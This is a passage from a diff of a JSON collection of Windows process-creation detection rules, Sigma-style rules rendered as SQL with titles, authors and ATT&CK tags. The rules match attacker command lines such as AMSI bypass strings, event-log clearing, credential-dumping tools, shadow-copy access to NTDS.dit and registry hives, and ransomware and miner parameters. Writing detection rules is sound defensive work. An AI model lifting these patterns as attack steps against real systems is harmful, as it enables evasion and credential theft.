ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "title": "Computer 
System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "status": "experimental", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting 
\"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1059", "attack.t1202" ], "falsepositives": [ 
@@ -21072,1832 +21133,1777 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", 
+ "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinRM usage" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.impact", - "attack.t1496" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": 
"087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects 
a ping command that uses a hex encoded IP address", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "NTDS maintenance" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": 
"Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Fsutil 
Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059" ], "falsepositives": [ - "Legitimate use" + "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": 
"HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" - ], - "filename": "proc_creation_win_lolbin_extexport.yml" - }, - { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
